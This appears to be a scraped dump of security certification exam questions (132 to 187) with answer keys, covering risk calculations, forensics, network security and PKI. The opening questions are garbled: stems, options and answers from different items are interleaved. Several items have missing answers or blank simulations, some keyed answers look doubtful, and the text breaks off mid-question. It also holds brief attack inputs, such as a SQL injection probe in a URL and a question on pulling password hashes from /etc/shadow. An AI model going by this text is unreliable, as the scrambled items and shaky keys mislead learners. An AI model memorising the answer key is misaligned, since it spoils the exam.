up to the minute. Data elements D. System requirements Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 133 A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. Correct Answer: C Section: (none) Explanation . Which of the following selections represent the BEST option for the CIO? A. The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. How would a security engineer BEST interpret the finance manager's needs? A. Issue a policy that requires only the most stringent security standards be implemented throughout the company. User requirements C. The CIO has hired consultants to develop use cases to test against various government and industry security standards. Issue a policy specifying best practice security standards and a baseline to be implemented across the company. B. Acceptance testing F. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance.Explanation/Reference: QUESTION 132 A finance manager says that the company needs to ensure that the new system can "replay" data. Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the company. Issue a RFI for vendors to determine which set of security standards is best for the company. Data storage E. C. Compliance standards B. Information digest G. D. for every exchange being tracked by the investment departments.

Explanation/Reference: QUESTION 134 An administrator has enabled salting for users' passwords on a UNIX box. /etc/security D. SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO). C. D. A penetration tester must attempt to retrieve password hashes. Which of the following is the MOST appropriate? A. /etc/shadow C. /sbin/logon D. Outsourcing transfers the risk to the third party. /etc/passwd B. B. Correct Answer: A Section: (none) Explanation . An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. Outsourcing transfers all the risk to the third party. /etc/password E. The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). /bin/bash Correct Answer: AB Section: (none) Explanation Explanation/Reference: QUESTION 135 A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers. The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. in order to speed up the time to market timeline. An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. A. compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure. thereby minimizing the cost and any legal obligations. In addition.

archive. Data snapshots C.example.Explanation/Reference: QUESTION 136 Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information? A. The administrator elects to secure www. Storage multipaths Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 137 An administrator is tasked with securing several website domains on a web server. Subject Alternative Names Certificate Correct Answer: D Section: (none) Explanation Explanation/Reference: . Which of the following would allow the administrator to secure those domains with a single issued certificate? A. and www. Deduplication B.com.com.org with the same certificate.example. mail. EV x509 Certificate D.example. Wildcard Certificate C. Intermediate Root Certificate B. LUN masking D.org.example.

Test the product and make a product recommendation. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 139 The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains PII.QUESTION 138 Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection. interview existing customers of the product and then recommend that the product be purchased. Consider outsourcing the product evaluation and ongoing management to an outsourced provider on the basis that each of the requirements are met and a lower total cost of ownership (TCO) is achieved. such as threats emerging from social media. Contribute to an RFP and then evaluate RFP responses to ensure that the vendor product meets all mandatory requirements. the analyst wants to get the issue addressed as soon as possible. Evaluate relevant RFC and ISO standards to choose an appropriate vendor product. Which of the following steps should Joe take to reach the desired outcome? A. Shut down the production network interfaces on the server and change all of the DBMS account passwords. Contact the local authorities so an investigation can be started as quickly as possible. B. Give access to internal security employees so that they can inspect the application payload data. D. Choose a popular NIPS product and then consider outsourcing the ongoing device management to a cloud provider. C. Research industry surveys. D. Research new technology vendors to look for potential products. BYOD and cloud storage prior to purchasing the product. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion? A. can be centrally managed and only reveals inspected application payload data to specified internal security employees. C. E. Refer the issue to management for handling according to the incident response process. Disable the front-end web server and notify the customer by email to determine how the customer would like to proceed. B. Ensure that the NIPS platform can also deal with recent technological advancements. Correct Answer: D Section: (none) . analyze up to 10Gbps of traffic. Since PII is involved.

capture RAM. Identity attestation H. capture non. implement chain of custody. Notify senior management. document. a team of forensics experts is hired to respond to the breach. SIM's PIN B. implement chain of custody. and implement chain of custody. secure the scene. capture volatile storage.volatile storage. capture had drive. capture volatile and non.volatile storage. the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Additionally. B. Email profiles G. take inventory. Which of the following should be implemented to ensure these processes can be automated? (Select THREE). MDM software E. Chargeback system D. Take inventory. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 142 An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud . capture non-volatile storage. capture volatile storage. secure the scene. Secure the scene. Which of the following is the correct order in which the forensics team should engage? A. D. and document the findings. Implement chain of custody. Presence software F. The team is in charge of collecting forensics evidence from the company's database server. and analyze original media. take inventory.Explanation Explanation/Reference: QUESTION 140 The telecommunications manager wants to improve the process for assigning company. and analyze the data. secure the scene. GPS tracking Correct Answer: BDG Section: (none) Explanation Explanation/Reference: QUESTION 141 During an incident involving the company main database. document. C. Remote wiping C.owned mobile devices and ensuring data is properly removed when no longer needed. A.

000 B. The executives at the company would like to have better insight into the location of their drivers to ensure the shipments are following secure routes. Equip each truck with an RFID tag for location services. Require drivers to geo-tag documentation at each delivery location.000 has an exposure factor of eight percent and an ARO of four. BPA B. BIA C. Install GSM tracking on each product for end-to-end delivery visibility.000 . Which of the following security documents should be used to clarify the roles and responsibilities between the teams? A. Which of the following figures is the system's SLE? A.000 C. OLA Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 143 A trucking company delivers products all over the country. $12.team. B. $2. D. C. Which of the following would BEST help the executives meet this goal? A. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 144 A system worth $100. Implement geo-fencing to track products. MOU D. $8.

an administrator wishes to secure public facing server farms in three subdomains: dc1. B. and dc3. Adjust the firewall ACL to prohibit development from directly accessing the production server farm.company.west.central. Update the vulnerability management plan to address data discrepancy issues.D.com. Implement change control practices at the organization level. Which of the following process level solutions would address this problem? A. D. Change development methodology from strict waterfall to agile.company.com. $32. C. 0 B. The development team has direct access to the production servers and is most likely the cause of the different release versions. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 146 Using SSL. 3 D. dc2. 6 . Upon investigation.000 Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 145 Customers have recently reported incomplete purchase history and other anomalies while accessing their account history on the web server farm. 1 C.company.east. it has been determined that there are version mismatches of key e-commerce applications on the production web servers.com. Which of the following is the number of wildcard SSL certificates that should be purchased? A.

The devices use EUI-64 format B.BROADCAST.1. A.MULTICAST> mtu ether f8:1e:af:ab:10:a3 inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5 inet 192. Which of the . which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6 addresses in the future? (Select TWO). The administrator must disable the IPv6 privacy extensions H. The router IPv6 advertisement has been disabled E. The network implements 6to4 tunneling D.168.168.Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 147 Since the implementation of IPv6 on the company network.14 netmask 0xffffff00 broadcast 192.RUNNING.SIMPLEX.SMART.255 inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary nd6 options=1<PERFORMNUD> media: autoselect status: active Given this output. The administrator must disable DHCPv6 option code 1 Correct Answer: BG Section: (none) Explanation Explanation/Reference: QUESTION 148 A facilities manager has observed varying electric use on the company's metered service lines. the facility manager thinks that there is a correlation between spikes in electric use and IT department activity. The administrator must disable IPv6 tunneling F.1. The facility management rarely interacts with the IT department unless new equipment is being delivered. even when the devices are centrally managed. the security administrator has been unable to identify the users associated with certain devices utilizing IPv6 addresses. The routers implement NDP C. However. en1: flags=8863<UP. The administrator must disable the mobile IPv6 router flag G.

A. Deploy a corporate Domain Controller in the DMZ at the main campus. Deploy a corporate Domain Controller to the branch location. C. Deploy a branch location Read-Only Domain Controller to the branch office location with a one-way trust. Deploy a branch location Domain Controller to the branch location with a one-way trust. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. Hiring a property custodian D. Which of the following designs is MOST appropriate for this scenario? A. Designing a business resource monitoring system C. F. Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a two-way trust. and the physical security posture of the building is weak. The branch location does not have a datacenter. E. Deploying a radio frequency identification tagging asset management system B. Facility management participation on a change control board F. Implementation of change management best practices Correct Answer: EG Section: (none) Explanation Explanation/Reference: QUESTION 149 A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link.following business processes and/or practices would provide better management of organizational resources with the IT department's needs? (Select TWO). D. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 150 An IT manager is working with a project manager from another subsidiary of the same . The company uses Active Directory for its directory service and host configuration management. B. Deploy a corporate Read-Only Domain Controller to the branch location. Rewriting the change board charter G. Purchasing software asset management software E.

217. A denial of service attack is targeting at the router. NETMASK 255.35. B. File-size validation E. IP 172.0 Caller 3. seq 3.439811 arp reply 172. A man-in-the-middle attack is underway on the network. id 2305. NETMASK 255.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:07:25.16.934840 arp reply 172.16.35.16.16. The project manager is responsible for a new software development effort that is being outsourced overseas. C. The default gateway is being spoofed on the network.35.35.35.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:08:10.34.254.937592 IP 172.255: ICMP echo request. IP 172.255.1 > 172.16.35.937590 IP 172.multinational organization.16. Source code vulnerability scanning B.16.16.34.16. id 2307. seq 2.16. ISP to ISP network jitter D.35.16.53.34. End to end network encryption Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 151 The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. length 65534 Which of the following is occurring on the network? A.254. while customer acceptance testing will be performed in house. length 65534 09:08:10.255. Which of the following capabilities is MOST likely to cause issues with network availability? A.937591 IP 172. length 65534 09:08:10. Correct Answer: D Section: (none) .0 Caller 2.255: ICMP echo request.173. The following information is compiled: Caller 1. The upstream router interface's MAC is 00-01-42-32-ab-1a A packet capture shows the following: 09:05:15.1 > 172. An ARP flood attack is targeting at the router.16.35. NETMASK 255. D. IP 172. id 2306.0 All callers are connected to the same switch and are routed by a router with five built-in interfaces. Time-based access control lists C. seq 1.255.124850 arp reply 172.254.35.255: ICMP echo request.1 > 172.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:06:16.

swap files. password = password + sha(password+salt) + aes256(password+salt) D. system processes. B. password = NULL . key = NULL . system processes. swap files and raw disk blocks. i++) { password = sha256(key) } C. Raw disk blocks. Which of the following. will MOST increase the time an offline password attack against the customers' data would take? A. File system information. Raw disk blocks. for (int i=0. i++) { key = sha(key + password) } B. if implemented. i<10000. swap files and file system information. for (int i=0.Explanation Explanation/Reference: QUESTION 152 A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. network processes. which of the following BEST represents the remaining order of volatility that the investigator should follow? A. i<5000. The security administrator is concerned with the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the customer's encryption key. swap files. C. key = aes128(sha256(password). network processes. network processes. D. Correct Answer: C Section: (none) Explanation . After memory. file system information. network processes. and file system information. system processes and raw disk blocks. System processes. password)) Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 153 An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost.

The client-server handshake could not negotiate strong ciphers. Establish a list of devices that must meet each regulation C.Explanation/Reference: QUESTION 154 ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE). The client-server handshake is based on TLS authentication. F. D. The client-server implements client-server mutual authentication with different certificates. Correct Answer: BC Section: (none) Explanation . Which of the following are true statements? (Select TWO). Centralize management of all devices on the network D. The client-server handshake is configured with a wrong priority. A. The X509 V3 certificate was issued by a non trusted public CA. Apply technical controls to meet compliance with the regulation Correct Answer: BDF Section: (none) Explanation Explanation/Reference: QUESTION 155 A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. A. B. E. C. Establish a company framework F. Compartmentalize the network E. The X509 V3 certificate is expired. Establish a list of users that must work with each regulation B.

Which of the following is a limitation of this approach to risk management? A. E. BPA C. In order to ensure a competitor does not become aware. MOU Correct Answer: E Section: (none) Explanation Explanation/Reference: QUESTION 157 A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. The front-facing web server offers an HTML form. which asks for a user's .Explanation/Reference: QUESTION 156 A medical device manufacturer has decided to work with another international organization to develop the software for a new robotic surgical platform to be introduced into hospitals within the next 12 months. medium. Subjective and based on an individual's experience. B. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 158 A web developer is responsible for a simple web application that books holiday accommodations. SOA E. Allows for cost and benefit analysis. C. management at the medical device manufacturer has decided to keep it secret until formal contracts are signed. D. Difficult to differentiate between high. and low risks. Calculations can be extremely complex to manage. Requires a high degree of upfront work to gather environment details. OLA B. SLA D. Which of the following documents is MOST likely to contain a description of the initial terms and arrangement and is not legally enforceable? A.

Which of the following is the MOST likely situation that has occurred? A. Computers are able to store numbers well above "billions" in size. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 159 A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Deduplication Correct Answer: DE Section: (none) Explanation Explanation/Reference: . Improper error handling prevented the application from recovering. Improper error handling prevented the application from recovering. Users have reported that the website is not functioning correctly. Dynamic disk pools E. C. Multipath F.age. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Which of the following technologies should the administrator implement to meet these goals? (Select TWO). LUN masking B. D. A. the website issues are not related to the large number being input. Snapshots C. The application has crashed because a very large integer has lead to a "divide by zero". Therefore. vSAN D. B. Improper error handling prevented the application from recovering.

Configure 802.QUESTION 160 A new IT company has hired a security consultant to implement a remote access system. Client-based VPN C. Which of the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO).11e on the network E. IPSec D. The company wants a flexible system to provide confidentiality and integrity for data in transit to the company's internally developed application GUI. Jump box E. Configure 802.1X on the network C. Which of the following remote access solutions has the lowest technical complexity? A. Install a HIPS on the SIP servers B. RDP server B. The security administrator also notices that the SIP servers are unavailable during these attacks. including mobile devices. Update the corporate firewall to block attacking addresses D. The security administrator notices internal DoS attacks from infected PCs on the network causing the VoIP system to drop calls. SSL VPN Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 161 Wireless users are reporting issues with the company's video conferencing and VoIP systems. Configure 802.1q on the network Correct Answer: AD Section: (none) Explanation Explanation/Reference: . A. which will enable employees to telecommute from home using both company issued as well as personal computing devices. Company policy prohibits employees from having administrative rights to company issued devices.

QUESTION 162
The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years, but that this year's
growth has slowed to around 7%. Over the same time period, the number of attacks against applications has decreased or stayed flat each year. At the start of the
measure period, the incidence of PC boot loader or BIOS based attacks was negligible. Starting two years ago, the growth in the number of PC boot loader attacks has
grown exponentially. Analysis of these trends would seem to suggest which of the following strategies should be employed?

A. Spending on SCADA protections should stay steady; application control spending should increase substantially and spending on PC boot loader controls should
increase substantially.
B. Spending on SCADA security controls should stay steady; application control spending should decrease slightly and spending on PC boot loader protections should
increase substantially.
C. Spending all controls should increase by 15% to start; spending on application controls should be suspended, and PC boot loader protection research should increase
by 100%.
D. Spending on SCADA security controls should increase by 15%; application control spending should increase slightly, and spending on PC boot loader protections
should remain steady.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 163
An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. The risk manager only
provided the accountant with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is the correct asset value calculated by the
accountant?

A. $4,800
B. $24,000
C. $96,000
D. $120,000

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 164
Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE).

A. Check log files for logins from unauthorized IPs.
B. Check /proc/kmem for fragmented memory segments.
C. Check for unencrypted passwords in /etc/shadow.
D. Check timestamps for files modified around time of compromise.
E. Use lsof to determine files with future timestamps.
F. Use gpg to encrypt compromised data files.
G. Verify the MD5 checksum of system binaries.
H. Use vmstat to look for excessive disk I/O.

Correct Answer: ADG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 165
A security tester is testing a website and performs the following manual query:
https://www.comptia.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended"
Which of the following is the response an example of?

A. Fingerprinting
B. Cross-site scripting
C. SQL injection
D. Privilege escalation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 166

In a situation where data is to be recovered from an attacker's location, which of the following are the FIRST things to capture? (Select TWO).

A. Removable media
B. Passwords written on scrap paper
C. Snapshots of data on the monitor
D. Documents on the printer
E. Volatile system memory
F. System hard drive

Correct Answer: CE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 167
Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the
following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).

A. Jailbroken mobile device
B. Reconnaissance tools
C. Network enumerator
D. HTTP interceptor
E. Vulnerability scanner
F. Password cracker

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 168
CORRECT TEXT

Company A has noticed abnormal behavior targeting their SQL server on the network from a rogue IP address. The company uses the following internal IP address
ranges: 192.10.1.0/24 for the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the 192.10.5.0/30 IP range. Instructions: Click on the
simulation button to refer to the Network Diagram for Company A. Click on Router 1, Router 2, and the Firewall to evaluate and configure each device.
Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces. Task 2: Reconfigure the appropriate devices to prevent the attacks from
continuing to target the SQL server and other servers on the corporate network.

.

.

.

.

.

.

.

Protocol. Modify the appropriate rule to allow communications. Task 3) An administrator added a rule to block access to the SQL server from anywhere on the network.0/24 Finance Subnet:192. D. Identify and correct this issue. Firewall ACLs are read from the top down Task 1) An administrator added a rule to allow their machine terminal server access to the server subnet. This rule is not working.1. A new administrator is asked to conduct this review on the internal firewall sitting between several Internal networks.168. Identify the rule and correct this issue. Given the following information answer the questions below: User Subnet: 192. The intent of this firewall is to make traffic more restrictive. B.A. Correct Answer: Section: (none) Explanation Explanation/Reference: Please check the explanation part for the solution. . This rule is not working. Action. and/or Rule Order columns.0/24 Server Subnet: 192.3. C. please modify the DST port. Task 2) All web servers have been changed to communicate solely over SSL.168.0/24 Instructions: To perform the necessary tasks.2. Task 4) Other than allowing all hosts to do network time and SSL. QUESTION 169 CORRECT TEXT Compliance with company policy requires a quarterly review of firewall rules.168. modify a rule to ensure that no other traffic is allowed.

.

Correct Answer: Section: (none) Explanation . D. C. B.A.

addresses. Which of the following should be implemented to help the company increase the security posture of its operations? A. Geo-fencing D. QUESTION 170 A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. as well as occasional chunks of data in unpredictable formats. Implement a de facto corporate standard for all analyzed data. Use well formed standard compliant XML and strict schemas. The company wants to reduce the idle time associated with international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. The developers want to construct a new data format and create custom tools to parse and process the data. C. and phone numbers. D.Explanation/Reference: Please look into the explanation for the solution to this question. Asset tracking C. The security administrator instead suggests that the developers: A. The systems must exchange large amounts of fixed format data such as names. Create a custom standard to define the data. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 171 An international shipping company discovered that deliveries left idle are being tampered with. Barcode scanner Correct Answer: C Section: (none) Explanation Explanation/Reference: . Back office database B. Only document the data format in the parsing application code. B.

security. ACLs on network equipment D. Servers must have a private certificate installed locally to provide assurance to the students. 3. Configure a firewall with deep packet inspection that restricts traffic to the systems B. Student devices must have network access. but not other lab networks. OAuth for authentication. IPSec VPN with mutual authentication for remote connectivity. SAML for federated authentication. L2TP VPN over TLS for remote connectivity. Which of the following BEST maximizes the protection of these systems from malicious software? A. Students must have a private certificate installed before gaining access. directory services groups for each lab group. ACLs on routing equipment C. 5. Each lab must be on a separate network segment. All students must use the same VPN connection profile. Configure the host firewall to ensure only the necessary applications have listening ports Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 173 An educational institution would like to make computer labs available to remote students. ACL on routing equipment Correct Answer: C Section: (none) . 4. Cloud service remote access tool for remote connectivity. 2. not simple access to hosts on the lab networks. 6. Configure the systems to ensure only necessary applications are able to run D. and programming courses. firewalls between each lab segment B. RADIUS for authentication. Which of the following components should be used to achieve the design in conjunction with directory services? A. The requirements are: 1.QUESTION 172 An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Labs must have access to the Internet. Configure a separate zone for the systems and restrict access to known ports C. SSL VPN for remote connectivity. The labs are used for various IT networking.

All placeholders must be filled. Drag and drop the BEST security solution to meet the given requirements. Options may be used once or not at all.Explanation Explanation/Reference: QUESTION 174 Company ABC is hiring customer service representatives from Company XYZ. Require each Company XYZ employee to use an IPSec connection to the required systems B. Require Company XYZ employees to establish an encrypted VDI session to the required systems B. The following requirements exist. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems? A. The representatives reside at Company XYZ's headquarters. Require a site-to-site VPN for intercompany communications Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 175 DRAG DROP An organization is implementing a project to simplify the management of its firewall network flows and implement security controls. . Require Company ABC employees to use two-factor authentication on the required systems C.

.

B.A. C. D. Correct Answer: Section: (none) Explanation Explanation/Reference: .

.

0/24192.1.0/24 Denyanyany Which of the following solutions would allow the users to access the active FTP server? A.0/24192.168.0/24 Permit192. Add a permit statement to allow traffic from 192.168.168.QUESTION 176 VPN users cannot access the active FTP server through the router but can access any server in the data center.0/24 User network .0/24 Deny192.1.1.2.168.3.1 from the VPN network C.5.168.168.0/24 Permit192.0/24 Permit192.168.0/24 Datacenter 192.168.0/24 Permit192. Additional network information: DMZ network 192. Quantum cryptography D.1/32192. Add a permit statement to allow traffic to 192.168.0/24 Permit192.4.168.5.5.4.168.168.2.2. Digital rights management Correct Answer: A .1.168.168.168.0/24192.5.168.1.3. Which of the following is the solutions architect MOST likely trying to implement? A.168.5.192.0/24 (FTP server is 192.1.168. The method also requires special handling and security for all key material that goes above and beyond most encryption systems.1. The proposed solution uses symmetric keys to encrypt all messages and is very resistant to unauthorized decryption.0/24 Deny192.168.5. Increase bandwidth limit on the VPN network Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 177 A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages.0/24 to the VPN network B.1.168.0/24192.0/24192. Configure the traffic shaper to limit DMZ traffic E. The solution has been derided as not being cost effective by other members of the IT department.168. PKI C.3. One time pads B.168. IPS is blocking traffic and needs to be reconfigured D.0/24\ Traffic shaper configuration: VLAN Bandwidth Limit (Mbps) VPN50 User175 HR250 Finance250 Guest0 Router ACL: ActionSourceDestination Permit192.0/24192.4.168.1.0/24 HR network - 192.11) VPN network 192.0/24192.168.

Section: (none) Explanation Explanation/Reference: QUESTION 178 The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. Begin a chain-of-custody on for the user's communication. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Next. Place a legal hold on the user's email account. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense D. Next. Next. Additionally. Increase the frequency and distribution of the USB violations report C. Perform a back up of the user's email account. the law enforcement agency has requested that the user's ongoing communication be retained in the user's account for future investigations. D. Perform an e-discover using the applicable search terms. back up the user's email for a future investigation. Every user receives a popup warning about this policy upon login. B. yet violations continue to occur. Next. C. Law enforcement has requested that the user continue to operate on the network as normal. Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices? A. Revise the corporate policy to include possible termination as a result of violations B. Implement group policy objects Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 179 A user is suspected of engaging in potentially illegal activities. place a legal hold on the user's email account. Which of the following will BEST meet the goals of law enforcement? A. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. export the applicable emails that match the search terms. they would like to have a copy of any communications from the user involving certain key terms. However. perform e-discovery searches to collect applicable emails. . The SIEM system produces a report of USB violations on a monthly basis.

Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 180 A bank has decided to outsource some existing IT functions and systems to a third party service provider. HIPS D. BPA Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 181 A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. MOU D. SOA E. WAF Correct Answer: CE Section: (none) Explanation . ISA B. NIDS E. A. Which of the following security technologies would BEST meet their requirements? (Select TWO). BIA C. HSM C. NIPS B. Which of the following is critical to ensure the successful management of system security concerns between the two organizations? A. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links.

Mon. Given that the ARO is twice per year. 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.168.14. D. These emails are subverting spam filters.11.18. $0 .231.com> Date: Mon.193 Mon.205 Mon.31. Enable STARTTLS on the spam filter. Shut down the SMTP service on the unauthorized mail server.com> Received: from 127.com" <customer@example.com> To: "customer@example.2. The web filtering solution will cost the organization $10.Subject: New Insurance Application Thread-Topic: New Insurance Application Please download and install software from the site below to maintain full access to your account.com (SMTP READY) with ESMTP (AIO). Block port 25 on the firewall for all unauthorized mail servers. Correct Answer: BD Section: (none) Explanation Explanation/Reference: QUESTION 183 An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage. 1 Nov 2010 13:15:11 . 01 Nov 2010 11:15:23 -0700 (PDT) Return-Path: <IT@company.com Additional information: The authorized mail servers IPs are 192. The email reads as follows: Delivered-To: customer@example.168.examplesite.000.55.2. Disable open relay functionality.Explanation/Reference: QUESTION 182 Customers are receiving emails containing a link to malicious software. E. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution? A.com>) Received: by smtpex. A.0.168.120.example.10 and 192. B. Identify the origination point for malicious activity on the unauthorized mail server. 01 Nov 2010 13:15:14 -0500 Received: from 172.122 by 192. C.000 per year. Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).0/25.45. 1 Nov 2010 13:15:14 -0500 From: Company <IT@Company.com Received: by 10. www.0.2. Mon.2. the ALE resulting from a data leak is $25. Mon.168.000 and the ALE after implementing the web filter is $15. The network's subnet is 192.com>. 1 Nov 2010 11:15:24 -0700 (PDT) Received: by 10.1 for <customer@example.

dig host. offset 0.org/documents_private/index. or outputs from the tools in use.B. A. $10. cksum 0x1800 (correct).113.company.com E.000 Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 184 Company policy requires that all unsupported operating systems be removed from the network. the network administrator sets up rules to deny packets with a source address in this subnet from entering the network. Which of the following is the administrator attempting to prevent? . id 9870.3.3.000 D. 09:18:16. http://www. $15.262743 IP (tos 0x0. Passive banner grabbing B.46.80: Flags [none]. At the border router. $7.500 E. $12.0/24 on its internal network. length 40) 192.php?search=string#&topic=windows&tcp =packet%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4 C.500 C. flags [none]. can be used to help the security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE).company. Password cracker C. length 0 F.7.0. Nmap Correct Answer: AF Section: (none) Explanation Explanation/Reference: QUESTION 185 An organization uses IP address block 203. proto TCP (6).1. The security administrator is using a combination of network based tools to identify such systems for the purpose of disconnecting them from the network. 443/tcp open http D.1051 > 10.168. and to deny packets with a destination address in this subnet from leaving the network. win 512. ttl 64. Which of the following tools.

Amplified DDoS attacks Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 186 A security auditor suspects two employees of having devised a scheme to steal money from the company. Job rotation C.example. While one employee submits purchase orders for personal items. Background checks B. Employee termination procedures Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 187 A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request: POST http://www. IP spoofing attacks D. BGP route hijacking attacks B.com/resources/NewBankAccount HTTP/1.A. Least privilege D. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Bogon IP network traffic C.1 Content-type: application/json { "account": [ . Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future? A. the other employee approves these purchase orders. Man-in-the-middle attacks E.

